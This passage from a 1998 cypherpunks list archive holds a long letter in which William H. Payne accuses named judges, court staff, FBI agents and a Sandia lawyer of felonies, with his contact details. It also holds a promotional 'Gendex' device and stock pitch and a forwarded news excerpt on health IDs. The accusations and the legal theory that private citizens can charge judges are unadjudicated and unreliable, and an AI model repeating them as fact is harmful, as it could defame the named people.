I forward criminal complaint affidavits on the above individuals to selected magistrate judge Marilyn Hall Patel.

Patel ignored my complaints. 

I return to the subject of breaking electronic locks for the FBI/ERF.

Smith's two decisions were overturned on appeal.

  However, both cases have been overruled on appeal. In the
  ground-breaking Atari decision, the Federal Circuit held
  that intermediate copying was a fair use.  The Sega
  decision, which was appealed to the Ninth Circuit Court of
  Appeals, similarly overruled the district court and held
  that intermediate copying may be fair use.

Sandia patents and trademark lawyer Gregory A. Cone in the enclosed affidavit for a ADEA lawsuit I filed in the District of New Mexico stated

  AFFIDAVIT OF GREGORY A. CONE

  Gregory A. Cone, being duly sworn, deposes and states:

  1. I am employed by Sandia Corporation.  I am an attorney
  admitted to practice law in the State of California and before the
  U. S. Patent and Trademark Office and concentrate on legal issues
  related to patent and copyright law.  In that capacity, I am 
  familiar with activities at the Sandia National Laboratories
  ("Sandia") as they related to what is sometimes referred to as
  "reverse engineering ." ...

  [I]t is the general view at Sandia that disassembly of "object
  code" under such circumstances constitutes a "fair use" of
  copyrighted software under 17 U.S.C. article 107 and is thus
  permissible.  Sandia bases its view on Sega Enterprises v.
  Accolade, Inc. 977 F.2d 1510, 24 U.S.P. Q. 2d 1561 (9th Cir.
  1992), amended, 1993 U. S. App. LEXIS 78, and Atari Games Corp
  v. Nintendo of America, Inc, 975 F.2d 832 (Fed. Cir. 
  1992).  ...

  FURTHER, Affidavit sayeth naught.
                                 
  (signed)
  GREGORY A. CONE

  SUBSCRIBED, SWORN TO and ACKNOWLEDGED before me on this 12th
  day of August, 1993, by Gregory A. Cone."
  (signed)
  Mary A. Resnick

  Notary Public

  My Commission Expires:

  2-7-94

Cone has the two citations reversed.  The U. S. Patent Quarterly references the Atari v Nintendo lawsuit 1510 should be corrected to 1015.

Cone issued the above affidavit to District of New Mexico federal court in attempt to show that I had no legal reason to refuse to  reverse engineer the Hirsch Scramblepad electronic lock.

I was covered under 10 C.F.R. 708 - DOE CONTRACTOR EMPLOYEE PROTECTION PROGRAM for my refusal to reverse engineer the Hirsch Scramblepad code.   

  708.1 Purpose,
  This part establishes procedures for timely and effective 
  processing of complaints by employees of contractors performing
  work at sites owned or leased by the Department of Energy (DOE),
  concerning alleged discriminatory actions taken by their employers
  in retaliation for the disclosure of information relative to health 
  and safety, mismanagement, and other matters as provided in 708.5(a),
  for participation in proceeding before Congress, or for the refusal
  to engage in illegal or dangerous activities." ...

Cone's affidavit attempts to create the appearance that reverse engineering was legal before July 27, 1992, the date of my firing.

  Title 18, Chapter 79, Article 1623 felony perjury.     

  Article 1623 - False declarations before grand jury or court
 (a) Whoever under oath (or in any declaration, certificate,
 verification, or statement under penalty of perjury as permitted 
 under section 1746 of title 28, United States Code) in any
 proceeding before or ancillary to any court or grand jury of
 the United States knowingly make any false material declaration 
 or makes or uses any other information, including any book, paper,
 document, record, recording, or other material, knowing the same
 to contain any false material declaration, shall be fined not more
 than $10,000 or imprisoned not more than five years, or both.
 
Decision of the Atari Games Corp. v. Nintendo of America appeal cited at page 1016 from 24 USPQ 2d was Decided SEPTEMBER 10, 1992.  

I was fired JULY 27, 1992 so my work assignment was illegal at the time I refused.

Therefore, Cone committed felony perjury IN WRITING filed with New Mexico District Federal Court.

Chronological review of criminal complaint affidavits would be valuable before I present the current criminal complaint affidavits.

1  Monday March 11, 1996 10:05 I wrote judge Fern Smith a certified return receipt requested letter to ask her to either arrange or personally indict Sandia lawyer Cone for felony perjury.

Smith did not respond.

2 Friday May 31, 1996 08:58 I write the criminal complaint affidavit for the arrest of Sandia lawyer Cone and appoint judge Fern Smith as magistrate.

3 Thursday June 13 on orders of Smith and Albuquerque FBI special agent in charge Thomas Kneir FBI agents Kohl and Schum visited my home at 17:08 to investigate me for sending letters referenced in 1 and 2 to Smith.

4  In response to 3 on Tuesday July 9, 1996 06:52 I filed criminal complaint affidavit against Cone, again, for felony perjury with J. Clifford Wallace, chief judge, Ninth Circuit Court of Appeals.  

Smith for

   4. Misprision of felony 

  Whoever, having knowledge of the actual commission of a felony cognizable   
  by a court of the United States, conceals and  does not as soon as possible make 
  known the same to some judge or other   person in civil or military authority under the
  United States, shall be fined under this title or imprisoned not more  than three years, 
  or both.

for Smith's failure to properly process Cone's felony perjury and
  
   241. Conspiracy against rights 

  If two or more persons conspire to injure, oppress, threaten, or   
  intimidate any person in any State, Territory, or District in
  the free exercise or enjoyment of any right or privilege secured to him 
  by the Constitution or laws of the United States, or because of his   
  having so exercised the same; ...

for sending, with Knier, FBI agents Kohl and Schum to my home in an attempt to intimidate me.

Knier for Conspiracy against rights for his complicity with Smith.

5  Monday July 15, 1996 06:23 I write Wallace again inquiring why he has not 
responded.

6  August 15, 1996 Thursday Ms. Corina Orozco, Deputy Clerk, Ninth Circuit 
Court of Appeals writes me to tell me

  In the future, all correspondence should be addressed to the
  Clerk of the Court.  Do not address any correspondence to
  any one specific judge of this court.

7  September 12, 1996 06:20 I inform Orozco by letter that she is obstructing justice.   I ask Orozco to desist.

8 July 25, 1996 Senior Case Expeditor [sic], Gwen Baptiste from the Office of the Clerk, United States Court of Appeals for The Ninth Circuit, writes

         Re: Complaint of Judicial Misconduct

      We have received your complaint of judicial misconduct.
      Pursuant to the Rules of the Judicial Council of the Ninth
      Circuit Governing Complaints of Judicial Misconduct or
      Disability, you complaint is being returned to you for
      compliance with the above rules.  A copy of these rules is
      enclosed.  To understand the purpose of the procedure and
      who may be complaint about please refer to Rules 1 and 2.

9  Wednesday September 18, 1996 11:05 by certified, return receipt requested mail I write Wallace again told tell him

  Lawyer Wallace, I did not intend to file or did I file a
  complaint of judicial misconduct.

  Lawyer Wallace, I filed a criminal complaint affidavit as I have
  a right to as a citizen of the United States of America when the
  criminal acts are committed by government personnel, their
  contractors, Department of Justice and judicial personnel.

10  Wednesday November 27, 1996 09:18 I wrote certified, return receipt requested letter to inform Wallace

  Purpose of this letter is to inform you of consequences of your failure   
  to perform your duties as required by law as magistrate judge.  You are 
  committing felony violations of law.

and

  If I have not complied with all applicable rules, then I ask that you 
  inform me of any non-compliance so that I can correct my criminal 
  complaints and re-submit them.

  I satisfied the requirement of the Constitution and Rules 3 and 4, and 
  issued written and sworn complaints that set forth the essential facts 
  constituting the offenses charged against Smith, Kneir, and Cone.  I 
  also showed facts showing that the offenses were committed by Smith, 
  Kneir and Cone and these individuals committed them.

  So I ask that you do your job and proceed with supervision of the 
  arrest and prosecution of Smith, Kneir, and Cone for title 18 felony 
  violations of law.

11  Monday March 24, 1997 17:57 I write a certified - return receipt requested letter to Marilyn Hall Patel, District Judge; California,  Northern to inform her she has been selected as magistrate to process the criminal complaint affidavit against Sandia Diversity Director Michael G. Robles for sending the enclosed SDRC report to Burtner of EEOC.

Robles did this without my written permission and without checking the accuracy of the information.  The information contained in the SDRC report is false and defaming.

12  Monday April 21, 1997 13:44 I write Patel a certified - return receipt requested letter containing a criminal complaint affidavit against Charles L Burtner, Director, U.S. Equal Employment Opportunity Commission [EEOC] Larry J. Trujillo, Investigator, Phoenix District Office for sending the false and libelous enclosed documents to Richard Gallegos in Albuquerque without my written consent.

13 Thursday May 8, 1997 06:30 I write a certified - return receipt requested to Patel containing

  Purpose of this letter is to file a criminal complaint 
  affidavit against Sandia National Laboratories [Sandia]  
  Disciplinary Review Committee members and attendees G. H. 
  Libman, R.A. Polocasz,  D. B. Davis,  M. E. Courtney,  
  W. R. Geer, C. A. Searls, J. D.  Giachino,  R. L. Ewing,  
  A. M. Torneby, R. B. Craner,  C. W. Childers,  E. Dunckel,  
  D. S. Miyoshi, J. J McAuliffe,  J. D. Martin, and  R. C. 
  Bonner for violation of the criminal penalties section of 
  the Privacy Act, 5 USC 552a(i)(2) and Title 18 felony 
  violations of Civil Rights, Section 241, Conspiracy against 
  right to citizens.

for their roles in maintaining an illegal system of records.

Sandia refused to acknowledge existence of the enclosed SDRC report and for denying my rights guaranteed under the Constitution.

I was never interviewed by the SDRC committee or had any chance to defend my self against the false and defaming claims of the SDRC.

14 Friday June 13, 1997 12:41 I write a certified, return receipt requested to Wallace containing a criminal complaint affidavit against Margret D. Thomas, Judicial Assistant to the Honorable 
Marilyn Hall Patel for violating  

   1512. Tampering with a witness, victim, or an informant ...
  (C) prevent the communication by any person to a law enforcement officer  
  or judge of the United States of information relating to the commission  
  or possible commission of a Federal offense ...
  (3) hinder, delay, or prevent the communication to a law enforcement 
  officer or judge of the United States of information relating to the   
  commission or possible commission of a Federal offense ...
  shall be fined under this title or imprisoned not more than ten years, or  
  both. 

for writing on May 9, 1997

	Dear Mr. Payne:

		We are in receipt of your recent letters.  Please
	be advised that we do not issue warrants on criminal 
	proceeding absent an indictment, information or complaint
	initiated by the United States Attorney.  For this reason,
	and by copy of this letter, we are referring this matter
	to that office.  Any future correspondence concerning these
	events should be sent to the United States Attorney and not
	to judge Patel.  Thank you.

				Very truly yours,

				MARGARET D. THOMAS
				Judicial Assistant to the Honorable
				Marilyn Hall Patel

	cc:  Joel Levin
 	      Criminal Section
	      Assistant United States Attorney

Judge Hug, Rule 3 of the Federal Rules of Criminal Procedure,  entitled the Complaint provides:

   The complaint is a written statement of the essential facts  constituting the offense charged.   It shall be   
  made upon  oath before a magistrate.

As you may be aware,

  An individual may "make a written complaint on oath before an  examining and committing magistrate, and 
  obtain a warrant of  arrest."  This is in conformity with the Federal Constitution,   and "consonant with the 
  principles of natural justice and    personal liberty found in the common law."
   
   [United States v Kilpatrick (1883, DC NC) 16G 765, 769]

You may also be aware,

   A complaint though quite general in terms is valid if it  sufficiently apprises the defendant of the nature of 
   the offense with which he is charged.

   [United States v Wood (1927, DC Tex) 26F2d 908, 910, affd 
   (CA5 Tex) 26 F2d 912.]

And for your edification,

   The commission of a crime must be shown by facts positively stated.  The oath or affirmation required is of 
   facts and not  opinions or conclusion.

   [United States ex rel. King v Gokey (1929, DC NY) 32 F2d
    93, 794]

   The complaint must be accompanied by an oath.

   [Re Rules of Court (1877, CC Ga) 3 Woods 502, F Cas No
    2126]

   A complaint must be sworn to before a commissioner or other  officer empowered to commit persons 
   charged with offenses  against the United States.

   [United States v Bierley ( 1971, WD Pa) 331 F Supp 1182]

   Such office is now called a magistrate.

   A complaint is ordinarily made by an investigating officer or  agent, and where private citizens seek 
   warrants of arrest, the    practice recommended by the Judicial Conference of the United 
   States is to refer the complaint to the United States Attorney.    However, further reference to him is 
   rendered futile where a   mandamus proceeding is brought to compel him to prosecute and 
   he opposes the proceeding.

   [Pugach v Klein (1961, SD NY) 193 F Supp 630, citing Manual
    for United States Commissioners 5 (1948)]

Any attempt to bring criminal complaints to government authorities would, of course, be futile.

I am a citizen of the United States and, judge Hug, you are the assigned magistrate.

   In order to satisfy the requirement of the Constitution and Rules 3 and 4, a written and sworn complaint 
   should set forth   the essential facts constituting the offense charged and also    facts showing that the offense 
   was committed and that the  defendant committed it.

And,

   As to the requirement that the complaint be made on personal knowledge of the complainant, it is enough 
   for the issuance of a warrant that a complainant shows it to be on the  knowledge of the complainant.

   [Giordenello v United States (1958) 357 US 480, 2 L Ed. 2d
    1503, 78 S Ct 1245, rev. (Ca5 Tx) 241 F2d 575, 579 in accord
    Rice v Ames (1901) 180 US 371, 45 L Ed 577, 21 S ct 406, and
    United States v Walker, (1952, CA2 NY) 197 F 2d 287, 289,
    cert den 344 US 877, 97 L Ed 679, 73 S Ct 172]

So as to keep contiguous the requirements of the law ad the criminal complaint affidavit, I will include these complaints in this letter to you.

      CRIMINAL COMPLAINT AFFIDAVIT:  J Clifford Wallace

Essential material facts are:
     
1 Tuesday July 9, 1996 06:52 Payne files criminal complaint affidavit on Sandia lawyer Cone for felony perjury with J Clifford Wallace, chief judge, Ninth Circuit Court of Appeals and judge Fern Smith for 
Misprision of felony for failure to prosecute Cone and Conspiracy against rights for sending, with FBI Albuquerque agent-in-charge Knier, FBI agents Kohl and Schum to Payne's home in an attempt to intimidate Payne.

2  Repeated attempts by certified return receipt requested mail to urge Wallace to do his job enumerated to 5-10 and 14 above in this letter go unanswered.

Count 1  Wallace made no attempt to bring lawyer Cone to justice despite possessing WRITTEN evidence of criminal activity.  Therefore,  Wallace is charged with Title 18    4. Misprision of felony for Wallace's failure to properly process criminal complaint affidavit.

Count 2  Wallace made no attempt to bring judge Fern Smith to justice despite possessing WRITTEN evidence of misprision of felony for not properly processing the criminal complaint affidavit against lawyer Cone and  1512. Tampering with a witness, victim, or an informant for sending FBI agents Kohl and Schum to Payne's home in an attempt to intimidate Payne. Therefore , Wallace is charged with Title 18    4. Misprision of felony for Wallace's failure to properly process a criminal complaint affidavit.

Count 3  Wallace made no attempt to bring FBI agent-in-charge to justice for violation of  1512. Tampering with a witness, victim, or an informant for sending FBI agents Kohl and Schum to Payne's home in an attempt to intimidate Payne. Wallace is charged with Title 18    4. Misprision of felony for Wallace's failure to properly process a criminal complaint affidavit.

Count 4  Wallace made no attempt to bring MARGARET D. THOMAS to justice for violation of    1512. Tampering with a witness, victim, or an informant ... for writing Thomas' May 9, 1997 to Payne. Wallace is charged with Title 18    4. Misprision of felony for Wallace's failure to properly process a criminal complaint affidavit.

                             	VERIFICATION

    	Under penalty of perjury as provided by law, the undersigned certifies 	pursuant to 28 USC section 
              1746 that material factual statements set forth in this criminal complaint are true and correct, except   
              as to any matters therein stated to be information and belief of such matters the undersigned certifies 
              as aforesaid that the undersigned verily believes the same to be true.



          	Date               William H. Payne
                                    13015 Calle de Sandias NE
                                    Albuquerque, NM 87111
                                    505-292-7037


      CRIMINAL COMPLAINT AFFIDAVIT: Marilyn Hall Patel

Essential material facts are:
     
1 Patel failed to respond to certified return receipt requested criminal complaint affidavits specified in 11 - 13 in this letter.

Count 1  Patel made did not properly process criminal complaint affidavits despite being in possession of documents showing criminal violations of the Privacy Act and violation of civil rights. Therefore,  Patel is charged with Title 18    4. Misprision of felony for Patel's failure to properly process criminal complaint affidavits.

                             	VERIFICATION

    	Under penalty of perjury as provided by law, the undersigned certifies 	pursuant to 28 USC section 
              1746 that material factual statements set forth in this criminal complaint are true and correct, except   
              as to any matters therein stated to be information and belief of such matters the undersigned certifies 
              as aforesaid that the undersigned verily believes the same to be true.



          	Date                William H. Payne
                                    13015 Calle de Sandias NE
                                    Albuquerque, NM 87111
                                    505-292-7037

Judge Hug, I have been  extremely patient with judges and clerks of the district of Northern California and Ninth Circuit.  

Criminal compliant affidavits were filed between March 11, 1996 and June 13, 1997.

Nothing has happened as of April 1, 1998.

I ask that you 

  1  issue warrants of arrest or
  2  inform me why you cannot proceed to do what I request

within 60 calendar days.

Smith's case is particularly egregious. 

Smith and Albuquerque FBI agent in charge James K. Weber, who replaced Kneir, sent US Marshals Lester and Lopez to my home on  January 24, 1997 in a second attempt to intimidate me.

Anotin Scalia was appointed magistrate to process criminal complaint affidavits against Smith and others for the second intimidation attempt.

Sincerely,



William H. Payne
13015 Calle de Sandias NE
Albuquerque, NM 87111

					VERIFICATION

	Under penalty of perjury as provided by law, the undersigned certifies 	pursuant to 28 USC section 
              1746 that material factual statements set forth in this criminal complaint are true and correct, except   
              as to any matters therein stated to be information and belief of such matters the undersigned certifies 
              as aforesaid that the undersigned verily believes the same to be true.



          	Date               William H. Payne
                                    13015 Calle de Sandias NE
                                    Albuquerque, NM 87111
                                    505-292-7037


Enclosures
Privacy Act criminal violation documents, 11 pages
AFFIDAVIT OF GREGORY A. CONE,  4 pages
May 9, 1997 letter from MARGARET D. THOMAS, 1 page




13






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gendexer@technologist.com
Date: Mon, 20 Jul 1998 06:27:16 -0700 (PDT)
To: tcmay@netcom.com
Subject: Fwd: GENDEX.NET TO REORGANIZE CIVILIZATION rev. 18
Message-ID: <199807201327.JAA14281@web02.globecomm.net>
MIME-Version: 1.0
Content-Type: text/plain


INTRODUCTION
> 
>      First there were pocket calculators, then personal memory
> organizers (PMO's), and next fully operating computers the size of a
> personal check book. 
>        Now the latest device to join the personal electronic evolution
> is a palm sized unit that fits easily in a shirt or purse pocket and
> is unlike anything you've seen before. Called a GENDEX, it not only
> keeps track of people data and personal appointments, it can also
> track personal or business expenses and serve as a depository
> and dispensary for real time monetary transactions over the Internet.
> And for those with email, just have it forwarded directly to your
> GENDEX.
>         What strikes you first about the GENDEX is its size - just
> seven inches by 3.5" and 3/8" deep - small enough to be carried almost
> anywhere - like an "electronic wallet". The second thing that you
> notice is its unusual keyboard - again, unlike anything else you've
> ever seen or used.
>         At first, the keyboard seems strange and undecipherable -
> instead of the usual QWERTY layout in rows, the keys are arranged in a
> circle on the small, one-finger keyboard, with the most common letters 
> in the inner circle. It's strange until you begin to use it. As you
> catch on to the pattern, you begin to see the benefit of the
> one-handed, one-finger layout, and most people quickly attain fairly
> high data entry rates with very little practice.
>         But it's not only this unusual keyboard that make the GENDEX
> different - and useful. Its the fact that the GENDEX can store,
> receive, and transmit financial data and monetary units over any
> financial network, including secure radio and Internet transmissions.
> Imagine being anywhere, buying or selling anything, and being able to
> complete the transaction with you hand-held personal bank. (In the
> future, it will even include a bar code reader to scan in any item or
> price!)
>         The GENDEX has been designed with the computer illiterate in
> mind. The keypad is simple looking with a minimum of entry keys, and
> every action and transaction is prompted for the next step. Just
> "follow the bouncing ball" and it steps you through anything you want
> to do with a minimum of learning time.
>         It's also designed to be used in any weather, dropped, sat on,
> stepped on, etc. The unique patentable self locking case is
> waterproof, shock proof, breakproof and, most importantly, idiot
> proof...instead of reaching for your wallet, in the future, many
> thousands of people will be reaching for their GENDEX. Programmed in
> JAVA with user replaceable chip sets, the GENDEX is easily upgradable
> as new features and uses come out.
>         The universally-usable GENDEX Java software will hopefully be
> available by the year's end. Until then, you'll just have to stay with
> using old fashioned credit cards, hand written checks, and nearly
> obsolete cash and currency. To check out a live demonstration of the
> GENDEX and its functions, visit the GENDEX website at http://gendex.net.
> 
> 
> ORGANIZER LOGIC REACHES UNDENIABLY EASY TO USE STATE
>  
>     Gendex organizer logic is now the most idiotproof and clearly easy
> to understand organizer logic in the world. Thanks to the efforts of
> an entrepreneurial team, a logical prototype has been crafted in the
> Java programming language and is open for testing at
> http://gendex.net. This was finally accomplished after many years of
> logic design by some clearly ingenious persons.
>      This new logic works with the seventeen key input and
> classification system developed by DEXCOM over numerous iterations.
> There are 4 main memory keys, 7 system keys, 4 arrow keys that move
> the cursor or scroll the display, and YES & NO keys. Each of the main
> memory keys opens with a table containing all the main functions you
> can do in that division of the memory organizer. Each of the
> functions, when selected, opens into a list of variations. These are
> called TABLES, and there are four, AGENDA, PEOPLE, MONEY and NOTES. 
> 	Ease-of-use comes from consistent application of ENTRY, INDEX and
> FIND system keys. HELP is ready to pop-up at any time to give the user
> easy to understand directions and options.
> 	By keying SYSTEM, Utilities like e-mail in/out, secure-unviolatable
> memory storage upload, communications carrier select, edit
> scratchpads, output port control, e-bank selection, proper
> calculators, smart power monitors, thesaurus/dictionary, and language
> translation are accessible within any memory function.
> 	The demonstration on the website can be played with manually using
> the selecting device and keying functional buttons. Soon a new control
> panel will be added, so that the demonstration can be played
> automatically by pressing the purposefully direct logic sequence keys.
> The automatic links shall have a 
> player piano effect - eventually more than 111 functional logic
> strings  so that even the passive websurfer can instruct himself about
> many things this unit does. 
> 	The logical prototype works in newest browsers, and there is a
> download assist button on the website to bring the latest browser into
> your own computer.
> 	What is happening now in DEXCOM is a team of five time-investing
> engineers are working toward completing a logical prototype. That is
> leading to completion of a working software product.
> 	The next step for the company will be to license the Gendex logic
> system for use to the makers of the many hard-to-use and complicated
> handheld and PDA systems already in user's hands. The first company
> product is a software disk that adds the friendly usable gendex
> functions to products like the H-P 620 handheld.
> 
> 
> Interested Parties:
> 
> DEXCOM USA Inc. is introducing its ultimate electronic personal memory
> organizer (Gendex EPMO). Gendex keeps track of Agenda, Money, People
> and Notes, and more. Gendex is the perfect vehicle for financial
> networks sending money via secure data radio, and over the internet.
> Gendex software will be available for purchase. It has all the
> easy-to-use logical prompts, and on-line real-time help functions to
> assist in all
> forms of transactions and memory recording. No other product in the
> market has all the ease of use and understandability built into it
> that Gendex does. This is the breakthru. Nearly all the others are
> expert systems requiring extensive training to use all functions.
> Gendex hardware will be available before the year 2000. It is
> waterproof, breakproof, and pocket sized. Its multichip module design
> will be widely licensed for lowest cost to the consumer. The company
> will brand name its own highest quality unit, and grade and distribute
> components made by world class manufacturers working under our
> lisences. Our designs utilize the latest technologies that can be made
> accessible to mass markets. 
> On the website is a fully animated gendex shell opening; it also now
> working logical prototype.
> Price per privately issued share of DEXCOM USA Inc. stock just
> quadrupled to $4, and is approaching IPO, with the potential for an
> eight way stock split.
> 
> 
> GENDEX.NET TO REORGANIZE CIVILIZATION
> 
> NEVER BE LATE 
> The advanced timekeeping and AGENDA scheduling functions that make it
> possible to schedule and remember one-time events, recurring events,
> and even place events in someone else's schedule (if they don't
> prevent you from doing so). This will eliminate a lot of potential
> embarassment to those who may forget about where they said they would
> be.
> 
> TELEPHONES
> Thanks to internet telephony, and the presence of speaker & microphone
> on the unit, and headsets for the pocketsized gendex, both cellular
> phones and home phones, and their networks, will have a lot less to
> do. This is because internet telephony is practically free, even for
> long distance calls.
> 
> PAPER MONEY
> The hazards and time consuming processes of making change will be
> replaced with the ease of sending money optically to smart cash
> registers and vending machines, parking meters etc., with optical
> interfaces to money registrars with radio outputs. (Of course, 'users'
> are subject to national banking laws.)
> 
> ELECTRONIC FUNDS TRANSFER
> People will be able to receive and pay bills, and send each other
> money over secure data networks. Gendex has all necessary logic to
> set-up and actualize transactions.
> 
> CREDIT CARDS
> Credit organizations will become E-BANKs using Gendex hardware and
> software, because it cuts costs. Until then, Gendex hardware has the
> power to directly write money to mag stripe cards. Ultimately,
> Gendex.net will send a lot of plastic to the scrap heap.
> 
> RIDECALL
> Eliminates superfluous automobiles by providing people you like (based
> on lifestyle) with rides to where they need to go, as you make money.
> This is coordinated by Gendex.net. Meet new friends, too.
> 
> MONITORING THE HONESTY OF YOUR LOCAL BANK
> Those who maintaing their files in CONVENTIONAL BANK ACCOUNTS
> MANAGEMENT will be able to keep track of interest they should be
> paying you, ATM costs, other banking costs and penalties to monitor
> accuracy of your local bank.
> 
> TRADING AND SELLING OVER THE NET
> Every kind of service or material goods will eventually be listed in
> the Bought,Buy,Sell&Trade INDEX. Gendex logic will enable everybody to
> sell or trade their goods and services, through Indexers who are
> already specialists in their respective fields. These Indexers do not
> work for gendex.net, rather they remain independant, while gendex.net
> takes a very small commission each time electronic banks transfer money.
> 
> FORMATS
> Prompted data entry of frequently repeated questions, coupled with
> radio access to remote data bases will eliminate clipboards and paper
> forms used in all repetitive data entry used in professional purposes.
> Gendex.net will create a library of tens of thousands of different
> formats for use by government, industry, military, courts, medical,
> and professionals in every walk of life. And these can be sent by
> radio to the Thousands of typists working in data entry jobs will need
> to find something else to do.
> 
> TAX DEDUCTIONS
> Every taxpayer who can write off business expenses will never lose
> expense records, and find many advantages with Gendex' advanced
> recording capabilities.
> 
> PHARMACY.NET
> Gendex prompted data entry and secure verification will eliminate the
> problem of reading doctor's cryptic handwriting. From NOTES, doctors
> specify treatments. A pharmacist in a van will come driving up to your
> house to serve the prescription rendered by doctors.
> 
> MEDICAL HISTORY
> Whatever ails you, and when, and how, can be recorded so that after
> you're dead, and they do the autopsy, they will have something to go on.
> 
> TELEVISION INTERNET REMOTE CONTROL
> Gendex EPMO hardware, with its highpowered bidirectional infrared
> port, can replace the intelligent aspect of internet boxes designed to
> bring internet via cable to people's living room televisions. 
> 
> SMART LOCKS ACCESS
> In the future, metal door locks will be replaced with a glass plate
> guarding an optically activated solenoid. This will enable smart
> systems in buildings to record who passed thru a door, when, and/or to
> execute decisions about who is authorized to pass. It can even require
> remittance of money, or act as a time clock for workers. Gendex EPMO
> hardware, with its bidirectional infrared port can handle all these
> transactions.
> 
> TRUCKERS LOGBOOK
> Over the road drivers will be able to accurately maintain records of
> how much time they spent driving, and what happened at points of
> delivery. With GPS attachment, trucker will always know where he is.
> 
> PROFESSIONAL TIME LOG
> Consultants who charge in small increments for time spent advising
> clients will benefit readily by the functions provided in this logic.
> 
> SPEAKING TRANSLATOR
> An issued unit of Gendex hardware or software will typically handle as
> many languages in its interface as one chooses to download.
> Ultimately, Gendex is intended to be able to handle all of input of
> characters in the users language, translation to another language like
> English or Japanese, and speaking that language via its speaker to
> listening "barbarians". 
> 
> You may argue that all these things are happening anyway, and indeed,
> some of them are. The difference here is that gendexes can be given
> away free to customers by financial institutions, in exchange for
> placing cash on deposit.
> 
> 
> 
> WHAT MAKES US DIFFERENT
> 
> 	The automatic logical demonstration on the website displays more than
> 59 logical functions. Actually, the number which will be programed is
> about 385, well organized and all totally accessible. Our "nearest
> competitor" in hardware (really, predecessor) 3COM PALM PILOT has only
> 4 logical functions. 
> 	Not only that, our hardware product exceeds all others because it is
> pocketsized, waterproof, breakproof and most importantly, idiotproof.
> Gendex hardware is an email machine that goes with you everywhere,
> even underwater. It's application specific electronic design is user
> serviceable and infinitely upgradeable. 
> 	Gendex hardware is designed with a microphone and a speaker to make
> telephone calls free over the internet. There is also a headset that
> attaches to the lower bidirectional optical ports. 
> 	Logically speaking, it is far easier to use Gendex than those
> products which are not as well designed and thought out. Gendex
> software has prompted data entry and on-line help, being designed for
> the computer-illiterate, thus will replace QUICKEN and most any
> organizer programs. 
> 	Gendex Software, and later hardware, includes prompted logic to
> handle electronic money transactions for on-line banks, and the user
> can make transactions safely. The palm Gendex is being designed with
> completely integrated dataradio (like a pager) and complete TCPIP for
> transmissions of email and e-money over private networks, the
> internet, wherever he goes, with no fear of losing his money
> (depending on what security software is available and what e-bank he
> uses).
> 
> 
> MAD VENTURE CAPITALIST WANTED
> 
> No sane venture capitalist would ever invest in DEXCOM. 
> Sane venture capitalists believe that the publication of this website,
> http://gendex.net, will awaken a giant sleeping gorilla. Its pretty
> obvious that the moment DEXCOM begins to succeed, some giant Japanese
> conglomerate or even Microsoft will create all sorts of knockoffs and
> circumvent all of DEXCOM's patent rights, earned in 14 years on R & D
> unsupported by all but the scantiest investments from people who
> should have known better than to waste their money on this, and loads
> of sweat equity. The very-innovative big established companies, with
> their risk taking daredevil unconventional creative engineers, would
> rather do it themselves, than license the technology, in order to get
> it all for themselves. Even Microsoft knows, it can walk all over
> little companies with complete impunity. The sane partners of any MAD
> venture capitalist who would even consider investing in this little
> startup, will wisely tell them that this is a considerable risk with
> little possible outcome in the way of capital gains. Its pretty
> obvious that there is no more to this website that meets the eye at a
> superficial glance. Not worth considering more because the sane
> venture capitalist sees that if its not a complete fake, that this
> must be just another remake, just another failure in the field of
> personal electronic organizers. It's a shame that so many
> unsophisticated people believe that DEXCOM could succeed. While its
> true that the little company continues to draw support from advance
> orders for its units, coming from little, uneducated and
> unsophisticated future customers, every savvy high class venture
> capitalist knows that its not little buyers who make money for a
> company in the long run, its the money that venture capitalists waste
> on entrepreneurs with sure-fire conventional ideas that makes them
> rich. Don't invest in DEXCOM - you will not regret it!
> 
> Please return email to webmaster@gendex.net
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
>  
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> _________________________________________________________
> DO YOU YAHOO!?
> Get your free @yahoo.com address at http://mail.yahoo.com


-----------------------------------------------------
Get free personalized email at http://email.lycos.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 20 Jul 1998 06:44:24 -0700 (PDT)
To: cypherpunks@toad.com
Subject: National Health ID Plan
Message-ID: <199807201344.JAA30199@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


Lead story, The New York Times, July 20, 1998:

Clinton Plans to Assign Codes, as Law Requires, to 
Create Giant Medical Database 

As legislation that would protect patient privacy languishes 
in Congress, the Clinton Administration is quietly laying 
plans to assign every American a "unique health identifier," 
a computer code that could be used to create a national 
database that would track every citizen's medical history 
from cradle to grave.
 
The electronic code was mandated by a 1996 law and would be 
the first comprehensive national identification system since 
the Social Security number was introduced in 1935. Although 
the idea has attracted almost no public attention, it is so 
contentious that Federal health officials who were supposed 
to propose a plan for the identifier by February, have made 
little headway and are instead holding hearings beginning on 
Monday to solicit public comment. 

Proponents, including insurance companies and public health 
researchers, say the benefits would be vast. Doctors and 
hospitals would be able to monitor the health of patients as 
they switch from one insurance plan to the next. Patients 
would not have to wade through a cumbersome bureaucracy to 
obtain old records. Billing would be streamlined, saving money. 
A national disease database could be created, offering 
unlimited opportunities for scientific study. 

But opponents, including privacy advocates and some doctors' 
groups, say the code smacks of Big Brother. They warn that 
sensitive health information might be linked to financial data 
or criminal records and that already tenuous privacy protections 
would be further weakened as existing managed care databases, 
for example, are linked. They say that trust in doctors, already 
eroded by managed care, would deteriorate further, with patients 
growing reluctant to share intimate details. And in a world 
where computer hackers can penetrate the Pentagon's computer 
system, they ask, will anyone's medical records be safe? 

Full story: http://www.nytimes.com

Mirror: http://jya.com/privacy-hit.htm

----------

There's also a short report on House Commerce Committee
passage of the WIPO copyright act (which limits encryption 
testing) by setting temporary provisions for "fair use" for 
education with bi-annual review by the Commerce Department 
to extend or let lapse:

Mirror: http://jya.com/wipo-hit.htm







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Mon, 20 Jul 1998 08:24:11 -0700 (PDT)
To: John Young <jya@pipeline.com>
Subject: Re: `Vulis terminator' full of crap (Re: net.cop revs up again)
In-Reply-To: <199807182302.AAA15438@server.eternity.org>
Message-ID: <35B35FE8.51386FBD@brainlink.com>
